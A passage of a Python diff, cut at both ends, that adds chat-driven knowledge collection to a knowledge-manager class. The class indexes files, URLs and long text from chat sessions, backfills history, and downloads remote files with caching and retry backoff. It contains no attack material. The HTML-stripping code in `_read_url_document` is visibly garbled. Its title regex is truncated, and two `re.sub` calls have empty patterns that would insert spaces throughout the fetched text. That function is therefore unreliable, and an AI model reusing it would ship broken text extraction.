"knowledge_enabled", True) + ): + return { + "changed": False, + "file_sources": 0, + "url_sources": 0, + "text_sources": 0, + } + + changed = False + file_sources = 0 + url_sources = 0 + errors: list[dict[str, str]] = [] + user_messages = list(request_messages or []) + + knowledge_auto_collect_chat_files = getattr(running_config, "knowledge_auto_collect_chat_files", None) + if knowledge_auto_collect_chat_files is None: + knowledge_auto_collect_chat_files = config.automation.knowledge_auto_collect_chat_files + + knowledge_auto_collect_chat_urls = getattr(running_config, "knowledge_auto_collect_chat_urls", None) + if knowledge_auto_collect_chat_urls is None: + knowledge_auto_collect_chat_urls = config.automation.knowledge_auto_collect_chat_urls + auto_collect_url_min_chars = int( + getattr( + running_config, + "auto_collect_url_min_chars", + _AUTO_COLLECT_URL_MIN_CONTENT_CHARS, + ) + or _AUTO_COLLECT_URL_MIN_CONTENT_CHARS + ) + + if knowledge_auto_collect_chat_files: + for source in self._build_file_sources_from_messages( + user_messages, + config, + session_id, + ): + if self._upsert_source(config, source): + changed = True + self._index_source_with_recovery( + source, + config, + running_config, + errors, + ) + file_sources += 1 + + if knowledge_auto_collect_chat_urls: + for source in self._build_url_sources_from_messages( + user_messages, + session_id, + user_id, + automation_config=config.automation, + min_content_chars=auto_collect_url_min_chars, + ): + if self._upsert_source(config, source): + changed = True + self._index_source_with_recovery( + source, + config, + running_config, + errors, + ) + url_sources += 1 + + result = { + "changed": changed, + "file_sources": file_sources, + "url_sources": url_sources, + "text_sources": 0, + } + if errors: + result["failed_sources"] = len(errors) + result["errors"] = errors + return result + + def auto_collect_turn_text_pair( + self, + config: KnowledgeConfig, + session_id: str, + user_id: str, + request_messages: list[Any] | None, + response_messages: list[Any] | None = None, + running_config: Any | None = None, + ) -> dict[str, Any]: + """Collect text knowledge after response, based on one user-assistant turn pair.""" + if not config.enabled or not bool( + getattr(running_config, "knowledge_enabled", True) + ): + return { + "changed": False, + "file_sources": 0, + "url_sources": 0, + "text_sources": 0, + } + + knowledge_auto_collect_long_text = getattr(running_config, "knowledge_auto_collect_long_text", None) + if knowledge_auto_collect_long_text is None: + knowledge_auto_collect_long_text = config.automation.knowledge_auto_collect_long_text + if not knowledge_auto_collect_long_text: + return { + "changed": False, + "file_sources": 0, + "url_sources": 0, + "text_sources": 0, + } + + knowledge_long_text_min_chars = getattr(running_config, "knowledge_long_text_min_chars", None) + if not isinstance(knowledge_long_text_min_chars, int): + knowledge_long_text_min_chars = config.automation.knowledge_long_text_min_chars + + errors: list[dict[str, str]] = [] + changed = False + text_sources = 0 + for source in self._build_text_sources_from_turn_pair( + request_messages=list(request_messages or []), + response_messages=list(response_messages or []), + session_id=session_id, + user_id=user_id, + knowledge_long_text_min_chars=knowledge_long_text_min_chars, + ): + if self._upsert_source(config, source): + changed = True + self._index_source_with_recovery( + source, + config, + running_config, + errors, + ) + text_sources += 1 + + result = { + "changed": changed, + "file_sources": 0, + "url_sources": 0, + "text_sources": text_sources, + } + if errors: + result["failed_sources"] = len(errors) + result["errors"] = errors + return result + + def auto_backfill_history_data( + self, + config: KnowledgeConfig, + running_config: Any | None = None, + ) -> dict[str, Any]: + """Backfill historical chat-session data into knowledge sources once.""" + if not config.enabled or not bool( + getattr(running_config, "knowledge_enabled", True) + ): + self._save_backfill_progress( + { + "running": False, + "completed": False, + "failed": False, + "reason": "knowledge_disabled", + "updated_at": datetime.now(UTC).isoformat(), + } + ) + return {"changed": False, "skipped": True, "reason": "knowledge_disabled"} + + signature = self._history_backfill_signature(running_config) + state = self._load_backfill_state() + if ( + state.get("completed") + and state.get("signature") == signature + ): + self._save_backfill_progress( + { + "running": False, + "completed": True, + "failed": False, + "reason": "already_completed", + "updated_at": datetime.now(UTC).isoformat(), + } + ) + return {"changed": False, "skipped": True, "reason": "already_completed"} + + chats_path = self.working_dir / CHATS_FILE + if chats_path.exists(): + payload = self._load_json(chats_path) + chats = payload.get("chats", []) + else: + chats = [] + + sessions_dir = self.working_dir / "sessions" + total_sessions = sum( + 1 for chat in chats if str(chat.get("session_id", "") or "").strip() + ) + changed = False + traversed_sessions = 0 + processed_sessions = 0 + file_sources = 0 + url_sources = 0 + text_sources = 0 + errors: list[dict[str, str]] = [] + + self._save_backfill_progress( + { + "running": True, + "completed": False, + "failed": False, + "total_sessions": total_sessions, + "traversed_sessions": 0, + "processed_sessions": 0, + "current_session_id": None, + "updated_at": datetime.now(UTC).isoformat(), + } + ) + + knowledge_long_text_min_chars = getattr(running_config, "knowledge_long_text_min_chars", None) + if not isinstance(knowledge_long_text_min_chars, int): + knowledge_long_text_min_chars = config.automation.knowledge_long_text_min_chars + knowledge_auto_collect_chat_files = getattr(running_config, "knowledge_auto_collect_chat_files", False) + knowledge_auto_collect_chat_urls = getattr(running_config, "knowledge_auto_collect_chat_urls", True) + knowledge_auto_collect_long_text = getattr(running_config, "knowledge_auto_collect_long_text", False) + auto_collect_url_min_chars = int( + getattr( + running_config, + "auto_collect_url_min_chars", + _AUTO_COLLECT_URL_MIN_CONTENT_CHARS, + ) + or _AUTO_COLLECT_URL_MIN_CONTENT_CHARS + ) + + try: + for chat in chats: + session_id = str(chat.get("session_id", "") or "") + user_id = str(chat.get("user_id", "") or "") + if not session_id: + continue + + traversed_sessions += 1 + self._save_backfill_progress( + { + "running": True, + "completed": False, + "failed": False, + "total_sessions": total_sessions, + "traversed_sessions": traversed_sessions, + "processed_sessions": processed_sessions, + "current_session_id": session_id, + "updated_at": datetime.now(UTC).isoformat(), + } + ) + + session_path = sessions_dir / self._session_filename(session_id, user_id) + if not session_path.exists(): + continue + state_payload = self._load_json(session_path) + messages = self._messages_from_session_state(state_payload) + if not messages: + continue + processed_sessions += 1 + + if knowledge_auto_collect_chat_files: + for source in self._build_file_sources_from_messages( + messages, + config, + session_id, + ): + upserted = self._upsert_source(config, source) + if upserted: + changed = True + self._index_source_with_recovery( + source, + config, + running_config, + errors, + ) + file_sources += 1 + + if knowledge_auto_collect_long_text: + for source in self._build_text_sources_from_messages( + messages, + config, + session_id, + user_id, + knowledge_long_text_min_chars, + ): + upserted = self._upsert_source(config, source) + if upserted: + changed = True + self._index_source_with_recovery( + source, + config, + running_config, + errors, + ) + text_sources += 1 + + if knowledge_auto_collect_chat_urls: + for source in self._build_url_sources_from_messages( + messages, + session_id, + user_id, + automation_config=config.automation, + min_content_chars=auto_collect_url_min_chars, + ): + upserted = self._upsert_source(config, source) + if upserted: + changed = True + self._index_source_with_recovery( + source, + config, + running_config, + errors, + ) + url_sources += 1 + except Exception as exc: + self._save_backfill_progress( + { + "running": False, + "completed": False, + "failed": True, + "error": str(exc), + "total_sessions": total_sessions, + "traversed_sessions": traversed_sessions, + "processed_sessions": processed_sessions, + "updated_at": datetime.now(UTC).isoformat(), + } + ) + raise + + self._save_backfill_state( + { + "completed": True, + "signature": signature, + "processed_sessions": processed_sessions, + "file_sources": file_sources, + "url_sources": url_sources, + "text_sources": text_sources, + "updated_at": datetime.now(UTC).isoformat(), + }, + ) + self._save_backfill_progress( + { + "running": False, + "completed": True, + "failed": False, + "total_sessions": total_sessions, + "traversed_sessions": traversed_sessions, + "processed_sessions": processed_sessions, + "updated_at": datetime.now(UTC).isoformat(), + } + ) + result = { + "changed": changed, + "skipped": False, + "processed_sessions": processed_sessions, + "file_sources": file_sources, + "url_sources": url_sources, + "text_sources": text_sources, + } + if errors: + result["failed_sources"] = len(errors) + result["errors"] = errors + return result + + def _index_source_with_recovery( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig, + running_config: Any | None, + errors: list[dict[str, str]], + ) -> None: + try: + self.index_source(source, config, running_config) + except Exception as exc: + errors.append( + { + "source_id": source.id, + "source_type": source.type, + "location": source.location, + "error": str(exc), + }, + ) + + def _read_file_document( + self, + path: Path, + config: KnowledgeConfig, + ) -> dict[str, str]: + file_path = path.expanduser().resolve() + if not file_path.exists() or not file_path.is_file(): + raise FileNotFoundError(f"Knowledge file not found: {file_path}") + if file_path.stat().st_size > config.index.max_file_size: + raise ValueError(f"Knowledge file exceeds max size: {file_path}") + return { + "path": str(file_path), + "title": file_path.name, + "text": self._normalize_text( + file_path.read_text(encoding="utf-8", errors="ignore"), + ), + } + + @staticmethod + def _read_url_document(url: str) -> dict[str, str]: + response = httpx.get(url, timeout=10.0, follow_redirects=True) + response.raise_for_status() + content_type = str(response.headers.get("content-type", "") or "").lower() + if content_type and not any( + marker in content_type for marker in _TEXTUAL_CONTENT_TYPE_MARKERS + ): + # Skip binary payloads (image/audio/video/pdf/zip, etc.) to avoid + # turning bytes into garbled text in knowledge sources. + return { + "path": url, + "title": url, + "text": "", + } + content = response.text + title = url + if "text/html" in response.headers.get("content-type", ""): + title_match = re.search( + r"]*>(.*?)", + content, + flags=re.S | re.I, + ) + if title_match: + extracted = KnowledgeManager._normalize_text( + unescape(title_match.group(1)), + ) + if extracted: + title = extracted + content = re.sub(r"", " ", content, flags=re.S | re.I) + content = re.sub(r"", " ", content, flags=re.S | re.I) + content = re.sub(r"<[^>]+>", " ", content) + return { + "path": url, + "title": title, + "text": KnowledgeManager._normalize_text(unescape(content)), + } + + @staticmethod + def _normalize_text(text: str) -> str: + compact = text.replace("\r", "\n") + # Remove all blank lines (lines containing only whitespace) + compact = re.sub(r"\n[ \t]*\n+", "\n", compact) + compact = re.sub(r"[ \t]+", " ", compact) + return compact.strip() + + def _extract_visible_chat_text(self, state: dict[str, Any]) -> str: + messages = self._messages_from_session_state(state) + snippets = [ + self._extract_text_from_runtime_message(message) + for message in messages + ] + return self._normalize_text("\n\n".join(item for item in snippets if item)) + + @staticmethod + def _messages_from_session_state(state: dict[str, Any]) -> list[dict[str, Any]]: + memory_state = state.get("agent", {}).get("memory", {}) + if isinstance(memory_state, dict): + raw_entries = memory_state.get("content", []) + elif isinstance(memory_state, list): + raw_entries = memory_state + else: + raw_entries = [] + + messages: list[dict[str, Any]] = [] + for entry in raw_entries: + raw_message = None + if isinstance(entry, list) and entry: + raw_message = entry[0] + elif isinstance(entry, dict): + raw_message = entry + if not isinstance(raw_message, dict): + continue + if raw_message.get("type") in {"plugin_call", "plugin_call_output"}: + continue + messages.append(raw_message) + return messages + + @staticmethod + def _extract_text_from_state(value: Any) -> str: + snippets: list[str] = [] + + def walk(node: Any) -> None: + if isinstance(node, str): + cleaned = node.strip() + if cleaned: + snippets.append(cleaned) + return + if isinstance(node, list): + for item in node: + walk(item) + return + if isinstance(node, dict): + for key in ("text", "thinking", "output", "name", "role"): + if key in node and isinstance(node[key], str): + walk(node[key]) + content = node.get("content") + if content is not None: + walk(content) + data = node.get("data") + if data is not None: + walk(data) + for nested_key, nested_value in node.items(): + if nested_key in {"text", "thinking", "output", "name", "role", "content", "data"}: + continue + if isinstance(nested_value, (dict, list)): + walk(nested_value) + + walk(value) + return "\n".join(snippets) + + def _build_file_sources_from_messages( + self, + messages: list[Any], + config: KnowledgeConfig, + session_id: str, + ) -> list[KnowledgeSourceSpec]: + sources: list[KnowledgeSourceSpec] = [] + seen_ids: set[str] = set() + for block in self._iter_message_blocks(messages): + if block.get("type") != "file": + continue + file_ref = self._file_reference_from_block(block) + if not file_ref: + continue + parsed_ref = urlparse(file_ref) + remote_hash = None + if parsed_ref.scheme in {"http", "https"}: + remote_hash = hashlib.sha1(file_ref.encode("utf-8")).hexdigest() + stored_path = self._materialize_file_reference( + file_ref, + block.get("name") or Path(file_ref).name or "chat-file", + config, + ) + if stored_path is None: + continue + digest = hashlib.sha1(str(stored_path).encode("utf-8")).hexdigest()[:12] + source_id = f"auto-file-{digest}" + if source_id in seen_ids: + continue + seen_ids.add(source_id) + tags = ["auto", "origin:auto", "source:chat", "auto:file"] + if remote_hash: + tags.extend(["remote:http", f"remote:url_hash:{remote_hash}"]) + sources.append( + KnowledgeSourceSpec( + id=source_id, + name=f"Auto File: {stored_path.name}", + type="file", + location=str(stored_path), + enabled=True, + recursive=False, + tags=tags, + summary=f"Auto-collected from chat session {session_id}", + ), + ) + return sources + + def _build_text_sources_from_messages( + self, + messages: list[Any], + config: KnowledgeConfig, + session_id: str, + user_id: str, + knowledge_long_text_min_chars: int, + ) -> list[KnowledgeSourceSpec]: + sources: list[KnowledgeSourceSpec] = [] + seen_ids: set[str] = set() + for role, text in self._iter_message_texts(messages): + normalized = self._normalize_text(text) + if len(normalized) < knowledge_long_text_min_chars: + continue + digest = hashlib.sha1(normalized.encode("utf-8")).hexdigest()[:12] + source_id = f"auto-text-{digest}" + if source_id in seen_ids: + continue + seen_ids.add(source_id) + title = normalized.splitlines()[0][:48] or "Long chat text" + sources.append( + KnowledgeSourceSpec( + id=source_id, + name=f"Auto Text: {title}", + type="text", + content=normalized, + enabled=True, + recursive=False, + tags=[ + "auto", + "origin:auto", + "source:chat", + "auto:text", + f"role:{role}", + ], + summary=( + f"Auto-saved from {role} message in {session_id}" + + (f" for {user_id}" if user_id else "") + ), + ), + ) + return sources + + def _build_text_sources_from_turn_pair( + self, + request_messages: list[Any], + response_messages: list[Any], + session_id: str, + user_id: str, + knowledge_long_text_min_chars: int, + ) -> list[KnowledgeSourceSpec]: + user_text = self._normalize_text( + "\n".join( + text + for role, text in self._iter_message_texts(request_messages) + if str(role).lower() == "user" + ) + ) + assistant_text = self._normalize_text( + "\n".join( + text + for role, text in self._iter_message_texts(response_messages) + if str(role).lower() == "assistant" + ) + ) + if not user_text or not assistant_text: + return [] + + merged = self._normalize_text(f"用户: {user_text}\n\n智能体: {assistant_text}") + if len(merged) < knowledge_long_text_min_chars: + return [] + + digest = hashlib.sha1(merged.encode("utf-8")).hexdigest()[:12] + source_id = f"auto-text-{digest}" + title = merged.splitlines()[0][:48] or "Long chat text" + return [ + KnowledgeSourceSpec( + id=source_id, + name=f"Auto Text: {title}", + type="text", + content=merged, + enabled=True, + recursive=False, + tags=[ + "auto", + "origin:auto", + "source:chat", + "auto:text", + "role:turn_pair", + ], + summary=( + f"Auto-saved from user-assistant turn in {session_id}" + + (f" for {user_id}" if user_id else "") + ), + ) + ] + + def _build_url_sources_from_messages( + self, + messages: list[Any], + session_id: str, + user_id: str, + automation_config: Any | None = None, + min_content_chars: int | None = None, + ) -> list[KnowledgeSourceSpec]: + sources: list[KnowledgeSourceSpec] = [] + seen_ids: set[str] = set() + for role, text in self._iter_message_texts(messages): + for url in self._extract_urls_from_text(text): + if self._should_exclude_url(url, automation_config): + logger.debug("Skipping excluded URL: %s", url) + continue + digest = hashlib.sha1(url.encode("utf-8")).hexdigest()[:12] + source_id = f"auto-url-{digest}" + if source_id in seen_ids: + continue + seen_ids.add(source_id) + label = url if len(url) <= 80 else f"{url[:77]}..." + fetched_text = "" + if min_content_chars is not None: + try: + doc = self._read_url_document(url) + except Exception: + continue + fetched_text = self._normalize_text(doc.get("text", "")) + if len(fetched_text) < max(0, min_content_chars): + continue + # Capture surrounding text context from the conversation message + # so title generation can use it without fetching the URL. + context_snippet = self._extract_url_context(text, url, max_chars=400) + summary = ( + f"Auto-collected URL from {role} message in {session_id}" + + (f" for {user_id}" if user_id else "") + ) + if context_snippet: + summary = f"{summary}\n来源上下文: {context_snippet}" + sources.append( + KnowledgeSourceSpec( + id=source_id, + name=f"Auto URL: {label}", + type="url", + location=url, + content=fetched_text, + enabled=True, + recursive=False, + tags=[ + "auto", + "origin:auto", + "source:chat", + "auto:url", + f"role:{role}", + ], + summary=summary, + ), + ) + return sources + + @staticmethod + def _extract_urls_from_text(text: str) -> list[str]: + found: list[str] = [] + seen: set[str] = set() + for match in _CHAT_URL_RE.findall(text or ""): + cleaned = match.rstrip(_URL_TRAILING_STRIP_CHARS) + if not cleaned: + continue + + # Defensive normalization: a previously merged token may contain + # additional URLs separated by CJK words or punctuation. + normalized_urls: list[str] = [] + cjk_chunks = re.split(r"[\u4e00-\u9fff]+", cleaned) + for chunk in cjk_chunks: + chunk = chunk.strip() + if not chunk: + continue + nested = _CHAT_URL_RE.findall(chunk) + if nested: + normalized_urls.extend(nested) + else: + normalized_urls.append(chunk) + + for candidate in normalized_urls: + candidate = candidate.rstrip(_URL_TRAILING_STRIP_CHARS) + if not candidate or candidate in seen: + continue + seen.add(candidate) + found.append(candidate) + return found + + @staticmethod + def _should_exclude_url(url: str, automation_config: Any | None = None) -> bool: + """Return True if the URL should be excluded from auto-collection. + + Exclusion criteria (all can be toggled via automation_config): + - Private/intranet addresses (localhost, 127.x, 192.168.x, etc.) + - URLs containing credential/token query parameters + - User-defined exclusion prefix patterns + """ + try: + parsed = urlparse(url) + except Exception: + return False + + # Private-address exclusion + exclude_private = True + if automation_config is not None: + exclude_private = bool( + getattr(automation_config, "url_exclude_private_addresses", True) + ) + if exclude_private: + host = parsed.hostname or "" + if _PRIVATE_HOST_RE.match(host): + return True + + # Token/credential query-param exclusion + exclude_tokens = True + if automation_config is not None: + exclude_tokens = bool( + getattr(automation_config, "url_exclude_token_params", True) + ) + if exclude_tokens and parsed.query: + try: + params = parse_qs(parsed.query, keep_blank_values=True) + if any(k.lower() in _URL_SENSITIVE_PARAMS for k in params): + return True + except Exception: + pass + + # User-defined pattern exclusion (prefix match) + exclude_patterns: list[str] = [] + if automation_config is not None: + raw = getattr(automation_config, "url_exclude_patterns", None) + if isinstance(raw, list): + exclude_patterns = raw + for pattern in exclude_patterns: + if isinstance(pattern, str) and url.startswith(pattern): + return True + + return False + + @staticmethod + def _extract_url_context(text: str, url: str, max_chars: int = 400) -> str: + """Extract a snippet of surrounding text around the given URL. + + Returns up to max_chars/2 chars before and max_chars/2 after + the URL occurrence, stripped and compacted. + """ + idx = text.find(url) + if idx == -1: + return "" + half = max_chars // 2 + before = text[max(0, idx - half): idx].strip() + after = text[idx + len(url): idx + len(url) + half].strip() + parts = [p for p in (before, after) if p] + snippet = " ... ".join(parts) + # Compact whitespace + snippet = re.sub(r"\s+", " ", snippet).strip() + return snippet[:max_chars] + + @staticmethod + def _block_to_dict(block: Any) -> dict[str, Any] | None: + if isinstance(block, dict): + return block + if hasattr(block, "model_dump"): + return block.model_dump() + if hasattr(block, "dict"): + return block.dict() + return None + + def _iter_message_blocks(self, messages: list[Any]) -> list[dict[str, Any]]: + blocks: list[dict[str, Any]] = [] + for message in messages: + content = getattr(message, "content", None) + if isinstance(message, dict): + content = message.get("content") + if isinstance(content, str): + blocks.append({"type": "text", "text": content}) + continue + if not isinstance(content, list): + continue + for block in content: + payload = self._block_to_dict(block) + if payload is not None: + blocks.append(payload) + return blocks + + def _iter_message_texts(self, messages: list[Any]) -> list[tuple[str, str]]: + texts: list[tuple[str, str]] = [] + for message in messages: + role = getattr(message, "role", None) + if isinstance(message, dict): + role = message.get("role") + role = role or "assistant" + if isinstance(message, dict) and message.get("type") in { + "plugin_call", + "plugin_call_output", + }: + continue + content = getattr(message, "content", None) + if isinstance(message, dict): + content = message.get("content") + if isinstance(content, str): + texts.append((role, content)) + continue + if not isinstance(content, list): + continue + joined: list[str] = [] + for block in content: + payload = self._block_to_dict(block) + if not payload or payload.get("type") != "text": + continue + text = payload.get("text") + if isinstance(text, str) and text.strip(): + joined.append(text) + if joined: + texts.append((role, "\n".join(joined))) + return texts + + def _extract_text_from_runtime_message(self, message: dict[str, Any]) -> str: + content = message.get("content") + if isinstance(content, str): + return self._normalize_text(content) + if not isinstance(content, list): + return "" + snippets: list[str] = [] + for block in content: + if not isinstance(block, dict): + continue + if block.get("type") == "text": + text = block.get("text") + if isinstance(text, str) and text.strip(): + snippets.append(text) + return self._normalize_text("\n".join(snippets)) + + @staticmethod + def _file_reference_from_block(block: dict[str, Any]) -> str: + for key in ("file_url", "path", "url"): + value = block.get(key) + if isinstance(value, str) and value.strip(): + return value.strip() + source = block.get("source") + if isinstance(source, dict): + value = source.get("url") or source.get("path") + if isinstance(value, str) and value.strip(): + return value.strip() + return "" + + def _materialize_file_reference( + self, + file_ref: str, + filename: str, + config: KnowledgeConfig, + ) -> Path | None: + parsed = urlparse(file_ref) + if parsed.scheme in {"", "file"}: + local_value = parsed.path if parsed.scheme == "file" else file_ref + path = Path(local_value).expanduser() + if path.exists() and path.is_file(): + return path.resolve() + return None + + if parsed.scheme in {"http", "https"}: + downloaded_name = Path(parsed.path).name or filename + return self._download_remote_file_with_cache( + file_ref, + downloaded_name, + config, + ) + return None + + def _download_remote_file_with_cache( + self, + url: str, + filename: str, + config: KnowledgeConfig, + ) -> Path | None: + url_key = hashlib.sha1(url.encode("utf-8")).hexdigest() + meta_path = self.remote_meta_dir / f"{url_key}.json" + now = datetime.now(UTC) + metadata: dict[str, Any] = {} + + if meta_path.exists(): + metadata = self._load_json(meta_path) + cached_path = metadata.get("file_path") + if isinstance(cached_path, str) and cached_path: + cached_file = Path(cached_path) + if cached_file.exists() and cached_file.is_file(): + return cached_file + next_retry_at = self._parse_iso_utc(metadata.get("next_retry_at")) + if next_retry_at is not None and next_retry_at > now: + return None + + try: + response = httpx.get(url, timeout=15.0, follow_redirects=True) + response.raise_for_status() + content = response.content + if len(content) > config.index.max_file_size: + self._save_remote_meta( + meta_path, + { + "url": url, + "status": "failed", + "last_error": "file too large", + "fail_count": 1, + "next_retry_at": ( + now + timedelta(seconds=30) + ).isoformat(), + "updated_at": now.isoformat(), + }, + ) + return None + + content_hash = hashlib.sha1(content).hexdigest() + blob_dir = self.remote_blob_dir / content_hash + blob_dir.mkdir(parents=True, exist_ok=True) + safe_name = self._safe_name(Path(filename).name) + blob_path = blob_dir / safe_name + if not blob_path.exists(): + blob_path.write_bytes(content) + + self._save_remote_meta( + meta_path, + { + "url": url, + "status": "ok", + "content_hash": content_hash, + "file_path": str(blob_path), + "file_name": safe_name, + "fail_count": 0, + "next_retry_at": None, + "updated_at": now.isoformat(), + }, + ) + return blob_path + except Exception as exc: + fail_count = int(metadata.get("fail_count", 0)) + 1 + backoff_seconds = min(300, 5 * (2 ** (fail_count - 1))) + self._save_remote_meta( + meta_path, + { + "url": url, + "status": "failed", + "last_error": str(exc), + "fail_count": fail_count, + "next_retry_at": ( + now + timedelta(seconds=backoff_seconds) + ).isoformat(), + "updated_at": now.isoformat(), + }, + ) + return None + + @staticmethod + def _save_remote_meta(path: Path, payload: dict[str, Any]) -> None: + path.write_text( + json.dumps(payload, ensure_ascii=False, indent=2), + encoding="utf-8", + ) + + @staticmethod + def _parse_iso_utc(value: Any) -> datetime | None: + if not isinstance(value, str) or not value: + return None + text = value.strip() + if text.endswith("Z"): + text = text[:-1] + "+00:00" + try: + parsed = datetime.fromisoformat(text) + except ValueError: + return None + if parsed.tzinfo is None: + return parsed.replace(tzinfo=UTC) + return parsed.astimezone(UTC) + + def _history_backfill_signature(self, running_config: Any | None) -> str: + payload = { + "knowledge_auto_collect_chat_files": bool( + getattr(running_config, "knowledge_auto_collect_chat_files", False), + ), + "knowledge_auto_collect_chat_urls": bool( + getattr(running_config, "knowledge_auto_collect_chat_urls", True), + ), + "knowledge_auto_collect_long_text": bool( + getattr(running_config, "knowledge_auto_collect_long_text", False), + ), + "knowledge_long_text_min_chars": int( + getattr(running_config, "knowledge_long_text_min_chars", 2000), + ), + "knowledge_chunk_size": int( + getattr(running_config, "knowledge_chunk_size", 1200), + ), + "version": 2, + } + return hashlib.sha1( + json.dumps(payload, sort_keys=True, ensure_ascii=False).encode("utf-8"), + ).hexdigest() + + @staticmethod + def _resolve_chunk_size( + config: KnowledgeConfig, + running_config: Any | None, + ) -> int: + chunk_size = getattr(running_config, "knowledge_chunk_size", None) + if isinstance(chunk_size, int): + return chunk_size + return config.index.chunk_size + + def history_backfill_status(self) -> dict[str, Any]: + """Return whether historical chat data still needs knowledge backfill.""" + state = self._load_backfill_state() + has_backfill_record = bool(state) + backfill_completed = bool(state.get("completed")) + + chats_path = self.working_dir / CHATS_FILE + history_chat_count = 0 + if chats_path.exists(): + try: + payload = self._load_json(chats_path) + chats = payload.get("chats", []) + history_chat_count = sum( + 1 + for chat in chats + if str(chat.get("session_id", "") or "").strip() + ) + except Exception: + history_chat_count = 0 + + marked_unbackfilled = not backfill_completed + has_pending_history = marked_unbackfilled and history_chat_count > 0 + return { + "has_backfill_record": has_backfill_record, + "backfill_completed": backfill_completed, + "marked_unbackfilled": marked_unbackfilled, + "history_chat_count": history_chat_count, + "has_pending_history": has_pending_history, + "progress": self.get_history_backfill_progress(), + } + + def get_history_backfill_progress(self) -> dict[str, Any]: + payload = self._load_backfill_progress_state() + return { + "running": bool(payload.get("running")), + "completed": bool(payload.get("completed")), + "failed": bool(payload.get("failed")), + "total_sessions": int(payload.get("total_sessions", 0) or 0), + "traversed_sessions": int(payload.get("traversed_sessions", 0) or 0), + "processed_sessions": int(payload.get("processed_sessions", 0) or 0), + "current_session_id": payload.get("current_session_id"), + "error": payload.get("error"), + "updated_at": payload.get("updated_at"), + "reason": payload.get("reason"), + } + + def _load_backfill_state(self) -> dict[str, Any]: + if not self.backfill_state_path.exists(): + return {} + try: + return self._load_json(self.backfill_state_path) + except Exception: + return {} + + def _save_backfill_state(self, payload: dict[str, Any]) -> None: + self.backfill_state_path.write_text( + json.dumps(payload, ensure_ascii=False, indent=2), + encoding="utf-8", + ) + + def _load_backfill_progress_state(self) -> dict[str, Any]: + if not self.backfill_progress_path.exists(): + return {} + try: + return self._load_json(self.backfill_progress_path) + except Exception: + return {} + + def _save_backfill_progress(self, payload: dict[str, Any]) -> None: + self.backfill_progress_path.write_text( + json.dumps(payload, ensure_ascii=False, indent=2), + encoding="utf-8", + ) + + def _remote_source_status(self, source: KnowledgeSourceSpec) -> dict[str, Any]: + remote_hash = "" + for tag in source.tags or []: + if tag.startswith("remote:url_hash:"): + remote_hash = tag.split(":", 2)[-1] + break + if not remote_hash: + return {} + + meta_path = self.remote_meta_dir / f"{remote_hash}.json" + if not meta_path.exists(): + return { + "remote_status": "unknown", + "remote_cache_state": "missing", + "remote_fail_count": 0, + "remote_next_retry_at": None, + "remote_last_error": None, + "remote_updated_at": None, + } + + payload = self._load_json(meta_path) + remote_status = payload.get("status", "unknown") + fail_count = int(payload.get("fail_count", 0) or 0) + next_retry_at = payload.get("next_retry_at") + next_retry_dt = self._parse_iso_utc(next_retry_at) + now = datetime.now(UTC) + + if remote_status == "ok": + if source.location and Path(source.location).exists(): + cache_state = "cached" + else: + cache_state = "missing" + elif remote_status == "failed": + if next_retry_dt is not None and next_retry_dt > now: + cache_state = "waiting_retry" + else: + cache_state = "ready_retry" + else: + cache_state = "unknown" + + return { + "remote_status": remote_status, + "remote_cache_state": cache_state, + "remote_fail_count": fail_count, + "remote_next_retry_at": next_retry_at, + "remote_last_error": payload.get("last_error"), + "remote_updated_at": payload.get("updated_at"), + } + + def _upsert_source( + self, + config: KnowledgeConfig, + source: KnowledgeSourceSpec, + ) -> bool: + normalized = self._source_with_auto_name(source, config) + for index, existing in enumerate(config.sources): + if existing.id != normalized.id: + continue + existing_normalized = self._source_with_auto_name(existing, config) + if existing_normalized.model_dump(mode="json") == normalized.model_dump(mode="json"): + return False + config.sources[index] = normalized + return True + config.sources.append(normalized) + return True + + def _source_with_auto_name( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> KnowledgeSourceSpec: + updates: dict[str, Any] = {} + source_for_title = source + + if not (source.summary or "").strip(): + generated_summary = self._generate_source_summary(source, config) + if generated_summary: + updates["summary"] = generated_summary + source_for_title = source.model_copy( + update={"summary": generated_summary} + ) + + generated = self._generate_source_name(source_for_title, config) + if source.name != generated: + updates["name"] = generated + + if not updates: + return source + return source.model_copy(update=updates) + + def _generate_source_summary( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> str: + semantic = self._semantic_summary_for_source(source, config) + if semantic: + keywords = self._semantic_keywords_for_source(source, config) + if keywords: + summary_with_keywords = ( + f"{semantic} 关键词: {', '.join(keywords)}" + ) + return self._truncate_summary(summary_with_keywords) + return self._truncate_summary(semantic) + + if source.type == "url": + url = (source.location or "").strip() + if url: + parsed = urlparse(url) + host = parsed.netloc or url + path = parsed.path.strip("/") + tail = path.split("/")[-1] if path else "" + if tail: + return self._truncate_summary(f"{host}/{tail}") + return self._truncate_summary(host) + + if source.type in {"file", "directory"} and source.location: + location = (source.location or "").strip() + if location: + return self._truncate_summary(Path(location).name or location) + + if source.name: + return self._truncate_summary(source.name) + return "" + + def _semantic_summary_for_source( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> str: + processed = self._process_source_knowledge(source, config) + return processed.get("summary", "") + + def _generate_source_name( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> str: + semantic = self._semantic_subject_for_source(source, config) + if semantic: + return self._truncate_title(semantic) + + if source.type == "url": + url = (source.location or "").strip() + if url: + parsed = urlparse(url) + host = parsed.netloc or url + path = parsed.path.strip("/") + tail = path.split("/")[-1] if path else "" + if tail: + return self._truncate_title(f"{host}/{tail}") + return self._truncate_title(host) + + if source.type in {"file", "directory"} and source.location: + location = (source.location or "").strip() + if location: + return self._truncate_title(Path(location).name or location) + + return self._truncate_title(source.id) + + def _semantic_subject_for_source( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> str: + processed = self._process_source_knowledge(source, config) + return processed.get("subject", "") + + def _semantic_keywords_for_source( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + top_n: int = _KEYWORD_DEFAULT_TOP_N, + ) -> list[str]: + processed = self._process_source_knowledge(source, config, top_n=top_n) + return processed.get("keywords", []) + + def _process_source_knowledge( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + top_n: int = _KEYWORD_DEFAULT_TOP_N, + ) -> dict[str, Any]: + candidates = self._collect_source_processing_candidates(source, config) + merged = self._normalize_text("\n".join(part for part in candidates if part)) + processed = self._process_knowledge_text(merged, top_n=top_n) + + # Keep deterministic priority for subjects: summary > content > 